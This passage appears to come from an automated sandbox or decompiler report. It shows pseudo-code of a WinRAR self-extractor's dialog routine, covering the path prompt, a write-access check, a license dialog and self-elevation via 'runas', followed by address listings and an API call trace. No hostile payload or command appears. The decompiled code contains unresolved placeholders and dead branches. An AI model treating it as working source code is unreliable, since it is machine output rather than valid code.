                                                    				void* _t220;
                                                    				void* _t234;
                                                    				signed int _t244;
                                                    				void* _t245;
                                                    				void* _t260;
                                                    				long _t262;
                                                    				long _t263;
                                                    				long _t264;
                                                    				int _t278;
                                                    				int _t280;
                                                    				void* _t285;
                                                    				void* _t289;
                                                    				int _t293;
                                                    				void* _t296;
                                                    				WCHAR* _t298;
                                                    				intOrPtr _t299;
                                                    				intOrPtr _t300;
                                                    				struct HWND__* _t311;
                                                    				intOrPtr _t314;
                                                    				void* _t316;
                                                    				struct HWND__* _t317;
                                                    				void* _t318;
                                                    				struct HWND__* _t320;
                                                    				long _t321;
                                                    				struct HWND__* _t322;
                                                    				intOrPtr _t323;
                                                    				void* _t325;
                                                    				void* _t327;
                                                    				void* _t328;
                                                    				void* _t330;
                                                    
                                                    				_t309 = __edx;
                                                    				_t296 = __ecx;
                                                    				E00CDEB78(0xcf2b04, _t328);
                                                    				E00CDEC50(0xfe80);
                                                    				_t314 =  *((intOrPtr*)(_t328 + 0xc));
                                                    				_t311 =  *(_t328 + 8);
                                                    				_t105 = E00CC1316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
                                                    				_t293 = 1;
                                                    				if(_t105 != 0) {
                                                    					L128:
                                                    					_t106 = _t293;
                                                    					L129:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
                                                    					return _t106;
                                                    				}
                                                    				_t316 = _t314 - 0x110;
                                                    				if(_t316 == 0) {
                                                    					_push(_t311);
                                                    					E00CDD69E(_t296, __edx, __eflags, __fp0);
                                                    					_t108 =  *0xd17b7c;
                                                    					 *0xd08450 = _t311;
                                                    					 *0xd08458 = _t311;
                                                    					__eflags = _t108;
                                                    					if(_t108 != 0) {
                                                    						SendMessageW(_t311, 0x80, 1, _t108); // executed
                                                    					}
                                                    					_t109 =  *0xd1ec84;
                                                    					__eflags = _t109;
                                                    					if(_t109 != 0) {
                                                    						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
                                                    					}
                                                    					_t110 = GetDlgItem(_t311, 0x68);
                                                    					 *(_t328 - 0x14) = _t110;
                                                    					SendMessageW(_t110, 0x435, 0, 0x400000);
                                                    					E00CDA64D(_t328 - 0x3474, 0x800);
                                                    					_t114 = GetDlgItem(_t311, 0x66);
                                                    					__eflags =  *0xd0a472;
                                                    					_t317 = _t114;
                                                    					 *(_t328 - 0x18) = _t317;
                                                    					_t298 = 0xd0a472;
                                                    					if( *0xd0a472 == 0) {
                                                    						_t298 = _t328 - 0x3474;
                                                    					}
                                                    					SetWindowTextW(_t317, _t298);
                                                    					E00CDABAB(_t317); // executed
                                                    					_push(0xd1fca0);
                                                    					_push(0xd1fc90);
                                                    					_push(0xd1ec90);
                                                    					_push(_t311);
                                                    					 *0xd08463 = 0; // executed
                                                    					_t117 = E00CDB093(_t298, _t309, __eflags); // executed
                                                    					__eflags = _t117;
                                                    					if(_t117 == 0) {
                                                    						 *0xd08456 = _t293;
                                                    					}
                                                    					__eflags =  *0xd1fca0;
                                                    					if( *0xd1fca0 > 0) {
                                                    						_push(7);
                                                    						_push( *0xd1fc90);
                                                    						_push(_t311);
                                                    						E00CDC73F(_t309, _t311);
                                                    					}
                                                    					__eflags =  *0xd0c577;
                                                    					if( *0xd0c577 == 0) {
                                                    						SetDlgItemTextW(_t311, 0x6b, E00CCE617(0xbf));
                                                    						SetDlgItemTextW(_t311, _t293, E00CCE617(0xbe));
                                                    					}
                                                    					__eflags =  *0xd1fca0;
                                                    					if( *0xd1fca0 <= 0) {
                                                    						L104:
                                                    						__eflags =  *0xd08463;
                                                    						if( *0xd08463 != 0) {
                                                    							L116:
                                                    							__eflags =  *0xd0a46c - 2;
                                                    							if( *0xd0a46c == 2) {
                                                    								EnableWindow(_t317, 0);
                                                    							}
                                                    							__eflags =  *0xd09468;
                                                    							if( *0xd09468 != 0) {
                                                    								E00CC12D3(_t311, 0x67, 0);
                                                    								E00CC12D3(_t311, 0x66, 0);
                                                    							}
                                                    							_t118 =  *0xd0a46c;
                                                    							__eflags = _t118;
                                                    							if(_t118 != 0) {
                                                    								__eflags =  *0xd08454;
                                                    								if( *0xd08454 == 0) {
                                                    									_push(0);
                                                    									_push(_t293);
                                                    									_push(0x111);
                                                    									_push(_t311);
                                                    									__eflags = _t118 - _t293;
                                                    									if(_t118 != _t293) {
                                                    										 *0xd230a0();
                                                    									} else {
                                                    										SendMessageW(); // executed
                                                    									}
                                                    								}
                                                    							}
                                                    							__eflags =  *0xd08456;
                                                    							if( *0xd08456 != 0) {
                                                    								_push(E00CCE617(0x90));
                                                    								_push(_t293);
                                                    								L127:
                                                    								SetDlgItemTextW(_t311, ??, ??);
                                                    							}
                                                    							goto L128;
                                                    						}
                                                    						__eflags =  *0xd1fc94;
                                                    						if( *0xd1fc94 != 0) {
                                                    							goto L116;
                                                    						}
                                                    						__eflags =  *0xd0a46c;
                                                    						if( *0xd0a46c != 0) {
                                                    							goto L116;
                                                    						}
                                                    						__eflags = 0;
                                                    						_t318 = 0xaa;
                                                    						 *((short*)(_t328 - 0x7874)) = 0;
                                                    						goto L108;
                                                    						do {
                                                    							while(1) {
                                                    								L108:
                                                    								__eflags = _t318 - 0xaa;
                                                    								if(_t318 != 0xaa) {
                                                    									goto L110;
                                                    								}
                                                    								__eflags =  *0xd0c577;
                                                    								if( *0xd0c577 == 0) {
                                                    									break;
                                                    								}
                                                    								L110:
                                                    								__eflags = _t318 - 0xab;
                                                    								if(__eflags != 0) {
                                                    									L113:
                                                    									E00CD05DA(__eflags, _t328 - 0x7874, " ", 0x2000);
                                                    									E00CD05DA(__eflags, _t328 - 0x7874, E00CCE617(_t318), 0x2000);
                                                    									break;
                                                    								}
                                                    								__eflags =  *0xd0c577;
                                                    								if(__eflags == 0) {
                                                    									goto L113;
                                                    								}
                                                    								_t318 = _t318 + 1;
                                                    							}
                                                    							_t318 = _t318 + 1;
                                                    							__eflags = _t318 - 0xb0;
                                                    						} while (__eflags <= 0);
                                                    						_t299 =  *0xd08440; // 0x0
                                                    						E00CD9ED5(_t299, __eflags,  *0xd0102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
                                                    						_t317 =  *(_t328 - 0x18);
                                                    						goto L116;
                                                    					} else {
                                                    						_push(0);
                                                    						_push( *0xd1fc90);
                                                    						_push(_t311); // executed
                                                    						E00CDC73F(_t309, _t311); // executed
                                                    						_t135 =  *0xd1fc94;
                                                    						__eflags = _t135;
                                                    						if(_t135 != 0) {
                                                    							__eflags =  *0xd0a46c;
                                                    							if(__eflags == 0) {
                                                    								_t300 =  *0xd08440; // 0x0
                                                    								E00CD9ED5(_t300, __eflags,  *0xd0102c,  *(_t328 - 0x14), _t135, 0, 0);
                                                    								L00CE3E2E( *0xd1fc94);
                                                    							}
                                                    						}
                                                    						__eflags =  *0xd0a46c - _t293;
                                                    						if( *0xd0a46c == _t293) {
                                                    							L103:
                                                    							_push(_t293);
                                                    							_push( *0xd1fc90);
                                                    							_push(_t311);
                                                    							E00CDC73F(_t309, _t311);
                                                    							goto L104;
                                                    						} else {
                                                    							 *0xd230c0(_t311);
                                                    							__eflags =  *0xd0a46c - _t293;
                                                    							if( *0xd0a46c == _t293) {
                                                    								goto L103;
                                                    							}
                                                    							__eflags =  *0xd0a471;
                                                    							if( *0xd0a471 != 0) {
                                                    								goto L103;
                                                    							}
                                                    							_push(3);
                                                    							_push( *0xd1fc90);
                                                    							_push(_t311);
                                                    							E00CDC73F(_t309, _t311);
                                                    							__eflags =  *0xd1fc98;
                                                    							if( *0xd1fc98 == 0) {
                                                    								goto L103;
                                                    							}
                                                    							_t139 = DialogBoxParamW( *0xd0102c, L"LICENSEDLG", 0, E00CDB5C0, 0);
                                                    							__eflags = _t139;
                                                    							if(_t139 == 0) {
                                                    								L23:
                                                    								 *0xd08454 = _t293;
                                                    								L24:
                                                    								_push(_t293);
                                                    								L25:
                                                    								EndDialog(_t311, ??); // executed
                                                    								goto L128;
                                                    							}
                                                    							goto L103;
                                                    						}
                                                    					}
                                                    				}
                                                    				if(_t316 != 1) {
                                                    					L6:
                                                    					_t106 = 0;
                                                    					goto L129;
                                                    				}
                                                    				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
                                                    				if(_t152 == 0) {
                                                    					__eflags =  *0xd08455;
                                                    					if( *0xd08455 != 0) {
                                                    						L21:
                                                    						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
                                                    						__eflags =  *0xd08455;
                                                    						if( *0xd08455 == 0) {
                                                    							__eflags =  *0xd08456;
                                                    							if( *0xd08456 == 0) {
                                                    								_t155 = GetDlgItem(_t311, 0x68);
                                                    								__eflags =  *0xd0845c;
                                                    								_t320 = _t155;
                                                    								if( *0xd0845c == 0) {
                                                    									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
                                                    									SendMessageW(_t320, 0xc2, 0, 0xcf35f4);
                                                    								}
                                                    								SetFocus(_t320);
                                                    								__eflags =  *0xd09468;
                                                    								if( *0xd09468 == 0) {
                                                    									_t321 = 0x800;
                                                    									E00CD0602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
                                                    									E00CDD453(_t296, _t328 - 0x1474, 0x800);
                                                    									E00CC4092(_t328 - 0x4974, 0x880, E00CCE617(0xb9), _t328 - 0x1474);
                                                    									_t330 = _t330 + 0x10;
                                                    									_push(_t328 - 0x4974);
                                                    									_push(0);
                                                    									E00CDD4D4();
                                                    								} else {
                                                    									_push(E00CCE617(0xba));
                                                    									_push(0);
                                                    									E00CDD4D4();
                                                    									_t321 = 0x800;
                                                    								}
                                                    								__eflags =  *0xd0a471;
                                                    								if( *0xd0a471 == 0) {
                                                    									E00CDDB4B(_t328 - 0x2474);
                                                    								}
                                                    								 *(_t328 - 0xd) = 0;
                                                    								E00CCA0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
                                                    								__eflags = 0;
                                                    								if(0 != 0) {
                                                    									L39:
                                                    									_t302 = E00CDAC04(_t328 - 0x2474);
                                                    									 *((char*)(_t328 - 0xe)) = _t302;
                                                    									__eflags = _t302;
                                                    									if(_t302 == 0) {
                                                    										_t263 = GetLastError();
                                                    										_t302 =  *((intOrPtr*)(_t328 - 0xe));
                                                    										__eflags = _t263 - 5;
                                                    										if(_t263 == 5) {
                                                    											 *(_t328 - 0xd) = _t293;
                                                    										}
                                                    									}
                                                    									_t173 =  *0xd0a471;
                                                    									__eflags = _t173;
                                                    									if(_t173 != 0) {
                                                    										L48:
                                                    										__eflags =  *((char*)(_t328 - 0xe));
                                                    										if( *((char*)(_t328 - 0xe)) != 0) {
                                                    											 *0xd0844c = _t293;
                                                    											E00CC12F1(_t311, 0x67, 0);
                                                    											E00CC12F1(_t311, 0x66, 0);
                                                    											SetDlgItemTextW(_t311, _t293, E00CCE617(0xe6)); // executed
                                                    											E00CC12F1(_t311, 0x69, _t293);
                                                    											SetDlgItemTextW(_t311, 0x65, 0xcf35f4); // executed
                                                    											_t322 = GetDlgItem(_t311, 0x65);
                                                    											__eflags = _t322;
                                                    											if(_t322 != 0) {
                                                    												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
                                                    												__eflags = _t210;
                                                    												SetWindowLongW(_t322, 0xfffffff0, _t210);
                                                    											}
                                                    											_push(5);
                                                    											_push( *0xd1fc90);
                                                    											_push(_t311);
                                                    											E00CDC73F(_t309, _t311);
                                                    											_push(2);
                                                    											_push( *0xd1fc90);
                                                    											_push(_t311);
                                                    											E00CDC73F(_t309, _t311);
                                                    											_push(0xd1ec90);
                                                    											_push(_t311);
                                                    											 *0xd21cbc = _t293; // executed
                                                    											E00CDDA52(_t302, _t309, __eflags); // executed
                                                    											_push(6);
                                                    											_push( *0xd1fc90);
                                                    											 *0xd21cbc = 0;
                                                    											_push(_t311);
                                                    											E00CDC73F(_t309, _t311);
                                                    											__eflags =  *0xd08454;
                                                    											if( *0xd08454 == 0) {
                                                    												__eflags =  *0xd0845c;
                                                    												if( *0xd0845c == 0) {
                                                    													__eflags =  *0xd1fcac;
                                                    													if( *0xd1fcac == 0) {
                                                    														_push(4);
                                                    														_push( *0xd1fc90);
                                                    														_push(_t311); // executed
                                                    														E00CDC73F(_t309, _t311); // executed
                                                    													}
                                                    												}
                                                    											}
                                                    											E00CC12D3(_t311, _t293, _t293);
                                                    											 *0xd0844c =  *0xd0844c & 0x00000000;
                                                    											__eflags =  *0xd0844c;
                                                    											_t186 =  *0xd08454; // 0x1
                                                    											goto L73;
                                                    										}
                                                    										__eflags = _t173;
                                                    										if(_t173 != 0) {
                                                    											goto L65;
                                                    										}
                                                    										goto L50;
                                                    									} else {
                                                    										__eflags = _t302;
                                                    										if(_t302 == 0) {
                                                    											L50:
                                                    											_t220 =  *(_t328 - 0xd);
                                                    											__eflags = _t220;
                                                    											 *(_t328 - 0xd) = _t220 == 0;
                                                    											__eflags = _t220;
                                                    											if(_t220 == 0) {
                                                    												L64:
                                                    												__eflags =  *(_t328 - 0xd);
                                                    												if( *(_t328 - 0xd) == 0) {
                                                    													L11:
                                                    													_push(0);
                                                    													goto L25;
                                                    												}
                                                    												L65:
                                                    												_push(E00CCE617(0x9a));
                                                    												E00CC4092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
                                                    												E00CC6D83(0xd01098, _t293);
                                                    												E00CDA7E4(_t311, _t328 - 0x3874, E00CCE617(0x96), 0x30);
                                                    												 *0xd0845c =  *0xd0845c + 1;
                                                    												goto L11;
                                                    											}
                                                    											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
                                                    											E00CCF28C(0xd0c472, _t328 - 0x574, 0x80);
                                                    											_push(0xd0b472);
                                                    											E00CC4092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
                                                    											_t330 = _t330 + 0x14;
                                                    											 *(_t328 - 0x58) = 0x3c;
                                                    											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
                                                    											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
                                                    											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
                                                    											 *(_t328 - 0x50) = _t311;
                                                    											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
                                                    											 *(_t328 - 0x3c) = _t293;
                                                    											 *((intOrPtr*)(_t328 - 0x38)) = 0;
                                                    											 *((intOrPtr*)(_t328 - 0x40)) = 0xd08468;
                                                    											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
                                                    											 *(_t328 - 0x14) = _t325;
                                                    											__eflags = _t325;
                                                    											if(_t325 == 0) {
                                                    												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
                                                    											} else {
                                                    												 *0xd17b80 = 0;
                                                    												_t245 = GetCommandLineW();
                                                    												__eflags = _t245;
                                                    												if(_t245 != 0) {
                                                    													E00CD0602(0xd17b82, _t245, 0x2000);
                                                    												}
                                                    												E00CDB425(0xd0c472, 0xd1bb82, 7);
                                                    												E00CDB425(0xd0c472, 0xd1cb82, 2);
                                                    												E00CDB425(0xd0c472, 0xd1db82, 0x10);
                                                    												 *0xd1ec83 = _t293;
                                                    												E00CCF3FA(_t293, 0xd1eb82, _t328 - 0x574);
                                                    												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
                                                    												E00CE0320(_t252, 0xd17b80, 0x7104);
                                                    												_t330 = _t330 + 0xc;
                                                    											}
                                                    											_t234 = ShellExecuteExW(_t328 - 0x58);
                                                    											E00CCF445(_t328 - 0x574, 0x80);
                                                    											E00CCF445(_t328 - 0xfe8c, 0x430c);
                                                    											__eflags = _t234;
                                                    											if(_t234 == 0) {
                                                    												_t327 =  *(_t328 - 0x1c);
                                                    												 *(_t328 - 0xd) = _t293;
                                                    												goto L62;
                                                    											} else {
                                                    												 *0xd230a4( *(_t328 - 0x20), 0x2710);
                                                    												_t67 = _t328 - 0x18;
                                                    												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
                                                    												__eflags =  *_t67;
                                                    												_t327 =  *(_t328 - 0x1c);
                                                    												while(1) {
                                                    													__eflags =  *_t327;
                                                    													if( *_t327 != 0) {
                                                    														break;
                                                    													}
                                                    													Sleep(0x64);
                                                    													_t244 =  *(_t328 - 0x18) + 1;
                                                    													 *(_t328 - 0x18) = _t244;
                                                    													__eflags = _t244 - 0x64;
                                                    													if(_t244 < 0x64) {
                                                    														continue;
                                                    													}
                                                    													break;
                                                    												}
                                                    												 *0xd1fcac =  *(_t328 - 0x20);
                                                    												L62:
                                                    												__eflags =  *(_t328 - 0x14);
                                                    												if( *(_t328 - 0x14) != 0) {
                                                    													UnmapViewOfFile(_t327);
                                                    													CloseHandle( *(_t328 - 0x14));
                                                    												}
                                                    												goto L64;
                                                    											}
                                                    										}
                                                    										E00CC4092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                    										_t330 = _t330 + 0x10;
                                                    										E00CC9556(_t328 - 0x34ac);
                                                    										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
                                                    										_t260 = E00CC966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
                                                    										 *((char*)(_t328 - 0xe)) = _t260;
                                                    										__eflags = _t260;
                                                    										if(_t260 == 0) {
                                                    											_t262 = GetLastError();
                                                    											__eflags = _t262 - 5;
                                                    											if(_t262 == 5) {
                                                    												 *(_t328 - 0xd) = _t293;
                                                    											}
                                                    										}
                                                    										_t37 = _t328 - 4;
                                                    										 *_t37 =  *(_t328 - 4) | 0xffffffff;
                                                    										__eflags =  *_t37;
                                                    										_t302 = _t328 - 0x34ac;
                                                    										E00CC959A(_t328 - 0x34ac); // executed
                                                    										_t173 =  *0xd0a471;
                                                    										goto L48;
                                                    									}
                                                    								} else {
                                                    									_t264 = GetLastError();
                                                    									__eflags = _t264 - 5;
                                                    									if(_t264 == 5) {
                                                    										L38:
                                                    										 *(_t328 - 0xd) = _t293;
                                                    										goto L39;
                                                    									}
                                                    									__eflags = _t264 - 3;
                                                    									if(_t264 != 3) {
                                                    										goto L39;
                                                    									}
                                                    									goto L38;
                                                    								}
                                                    							} else {
                                                    								_t186 = _t293;
                                                    								 *0xd08454 = _t186;
                                                    								L73:
                                                    								__eflags =  *0xd0845c;
                                                    								if( *0xd0845c <= 0) {
                                                    									goto L24;
                                                    								}
                                                    								__eflags = _t186;
                                                    								if(_t186 != 0) {
                                                    									goto L24;
                                                    								}
                                                    								 *0xd08455 = _t293;
                                                    								SetDlgItemTextW(_t311, _t293, E00CCE617(0x90));
                                                    								_t323 =  *0xd01098;
                                                    								__eflags = _t323 - 9;
                                                    								if(_t323 != 9) {
                                                    									__eflags = _t323 - 3;
                                                    									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
                                                    									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
                                                    								} else {
                                                    									_t193 = 0xa0;
                                                    								}
                                                    								E00CD0602(_t328 - 0x474, E00CCE617(_t193), 0x200);
                                                    								__eflags = _t323 - 9;
                                                    								if(_t323 == 9) {
                                                    									__eflags =  *0xd0c574;
                                                    									if( *0xd0c574 != 0) {
                                                    										_t201 = E00CE3E13(_t328 - 0x474);
                                                    										_t202 = E00CCE617(0xa1);
                                                    										__eflags = 0x200;
                                                    										E00CC4092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
                                                    									}
                                                    								}
                                                    								E00CDA7E4(_t311, _t328 - 0x474, E00CCE617(0x96), 0x30);
                                                    								goto L128;
                                                    							}
                                                    						}
                                                    						_t293 = 1;
                                                    						__eflags =  *0xd08456;
                                                    						if( *0xd08456 == 0) {
                                                    							goto L24;
                                                    						}
                                                    						goto L23;
                                                    					}
                                                    					__eflags =  *0xd21cbc;
                                                    					if( *0xd21cbc == 0) {
                                                    						goto L21;
                                                    					} else {
                                                    						__eflags =  *0xd21cbd;
                                                    						 *0xd21cbd = _t152 & 0xffffff00 |  *0xd21cbd == 0x00000000;
                                                    						SetDlgItemTextW(_t311, 1, E00CCE617(((_t152 & 0xffffff00 |  *0xd21cbd == 0x00000000) & 0x000000ff) + 0xe6));
                                                    						while(1) {
                                                    							__eflags =  *0xd21cbd;
                                                    							if( *0xd21cbd == 0) {
                                                    								goto L128;
                                                    							}
                                                    							__eflags =  *0xd08454;
                                                    							if( *0xd08454 != 0) {
                                                    								goto L128;
                                                    							}
                                                    							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
                                                    							__eflags = _t278;
                                                    							if(_t278 == 0) {
                                                    								goto L128;
                                                    							} else {
                                                    								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
                                                    								__eflags = _t280;
                                                    								if(_t280 == 0) {
                                                    									TranslateMessage(_t328 - 0x74);
                                                    									DispatchMessageW(_t328 - 0x74);
                                                    								}
                                                    								continue;
                                                    							}
                                                    						}
                                                    						goto L128;
                                                    					}
                                                    				}
                                                    				_t285 = _t152 - 1;
                                                    				if(_t285 == 0) {
                                                    					__eflags =  *0xd0844c;
                                                    					 *0xd08454 = 1;
                                                    					if( *0xd0844c == 0) {
                                                    						goto L11;
                                                    					}
                                                    					__eflags =  *0xd0845c;
                                                    					if( *0xd0845c != 0) {
                                                    						goto L128;
                                                    					}
                                                    					goto L11;
                                                    				}
                                                    				if(_t285 == 0x65) {
                                                    					_push(0x800);
                                                    					_t289 = E00CC124F(_t311, E00CCE617(0x64), _t328 - 0x1474);
                                                    					__eflags = _t289;
                                                    					if(_t289 == 0) {
                                                    						goto L128;
                                                    					} else {
                                                    						_push(_t328 - 0x1474);
                                                    						_push(0x66);
                                                    						goto L127;
                                                    					}
                                                    				}
                                                    				goto L6;
                                                    			}

                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbcc9
                                                    0x00cdbcce
                                                    0x00cdbcdb
                                                    0x00cdbcdb
                                                    0x00cdbcdf
                                                    0x00cdbce2
                                                    0x00cdbceb
                                                    0x00cdbceb
                                                    0x00000000
                                                    0x00cdbcdf
                                                    0x00cdbc9b
                                                    0x00cdbac2
                                                    0x00cdbac7
                                                    0x00cdbad0
                                                    0x00cdbad5
                                                    0x00cdbae8
                                                    0x00cdbaed
                                                    0x00cdbaf0
                                                    0x00cdbaf2
                                                    0x00cdbaf4
                                                    0x00cdbafa
                                                    0x00cdbafd
                                                    0x00cdbaff
                                                    0x00cdbaff
                                                    0x00cdbafd
                                                    0x00cdbb02
                                                    0x00cdbb02
                                                    0x00cdbb02
                                                    0x00cdbb06
                                                    0x00cdbb0c
                                                    0x00cdbb11
                                                    0x00000000
                                                    0x00cdbb11
                                                    0x00cdba68
                                                    0x00cdba68
                                                    0x00cdba6e
                                                    0x00cdba71
                                                    0x00cdba78
                                                    0x00cdba78
                                                    0x00000000
                                                    0x00cdba78
                                                    0x00cdba73
                                                    0x00cdba76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdba76
                                                    0x00cdb974
                                                    0x00cdb974
                                                    0x00cdb976
                                                    0x00cdbe40
                                                    0x00cdbe40
                                                    0x00cdbe47
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbe4d
                                                    0x00cdbe4f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbe5a
                                                    0x00cdbe68
                                                    0x00cdbe6e
                                                    0x00cdbe74
                                                    0x00cdbe77
                                                    0x00cdbe82
                                                    0x00cdbe8c
                                                    0x00cdbe8c
                                                    0x00cdbe79
                                                    0x00cdbe79
                                                    0x00cdbe79
                                                    0x00cdbea4
                                                    0x00cdbea9
                                                    0x00cdbeac
                                                    0x00cdbeae
                                                    0x00cdbeb5
                                                    0x00cdbebe
                                                    0x00cdbecb
                                                    0x00cdbed6
                                                    0x00cdbee8
                                                    0x00cdbeed
                                                    0x00cdbeb5
                                                    0x00cdbf05
                                                    0x00000000
                                                    0x00cdbf05
                                                    0x00cdb972
                                                    0x00cdb94e
                                                    0x00cdb94f
                                                    0x00cdb956
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb956
                                                    0x00cdb8a8
                                                    0x00cdb8af
                                                    0x00000000
                                                    0x00cdb8b1
                                                    0x00cdb8b1
                                                    0x00cdb8bb
                                                    0x00cdb8d1
                                                    0x00cdb920
                                                    0x00cdb920
                                                    0x00cdb927
                                                    0x00cdb929
                                                    0x00cdb929
                                                    0x00cdb8d9
                                                    0x00cdb8e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb8ef
                                                    0x00cdb8f5
                                                    0x00cdb8f7
                                                    0x00000000
                                                    0x00cdb8fd
                                                    0x00cdb902
                                                    0x00cdb908
                                                    0x00cdb90a
                                                    0x00cdb910
                                                    0x00cdb91a
                                                    0x00cdb91a
                                                    0x00000000
                                                    0x00cdb90a
                                                    0x00cdb8f7
                                                    0x00000000
                                                    0x00cdb920
                                                    0x00cdb8af
                                                    0x00cdb838
                                                    0x00cdb83a
                                                    0x00cdb878
                                                    0x00cdb87f
                                                    0x00cdb885
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb887
                                                    0x00cdb88e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb88e
                                                    0x00cdb83f
                                                    0x00cdb848
                                                    0x00cdb85d
                                                    0x00cdb862
                                                    0x00cdb864
                                                    0x00000000
                                                    0x00cdb86a
                                                    0x00cdb870
                                                    0x00cdb871
                                                    0x00000000
                                                    0x00cdb871
                                                    0x00cdb864
                                                    0x00000000

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDB7E5
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDB8D1
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB8EF
                                                    • IsDialogMessageW.USER32(?,?), ref: 00CDB902
                                                    • TranslateMessage.USER32(?), ref: 00CDB910
                                                    • DispatchMessageW.USER32(?), ref: 00CDB91A
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CDB93D
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB960
                                                    • GetDlgItem.USER32(?,00000068), ref: 00CDB983
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDB99E
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDB9B1
                                                      • Part of subcall function 00CDD453: _wcslen.LIBCMT ref: 00CDD47D
                                                    • SetFocus.USER32(00000000), ref: 00CDB9B8
                                                    • _swprintf.LIBCMT ref: 00CDBA24
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CDD4D4: GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                      • Part of subcall function 00CDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CDBA68
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CDBA90
                                                    • GetTickCount.KERNEL32 ref: 00CDBAAE
                                                    • _swprintf.LIBCMT ref: 00CDBAC2
                                                    • GetLastError.KERNEL32(?,00000011), ref: 00CDBAF4
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CDBB43
                                                    • _swprintf.LIBCMT ref: 00CDBB7C
                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CDBBD0
                                                    • GetCommandLineW.KERNEL32 ref: 00CDBBEA
                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CDBC47
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00CDBC6F
                                                    • Sleep.KERNEL32(00000064), ref: 00CDBCB9
                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CDBCE2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CDBCEB
                                                    • _swprintf.LIBCMT ref: 00CDBD1E
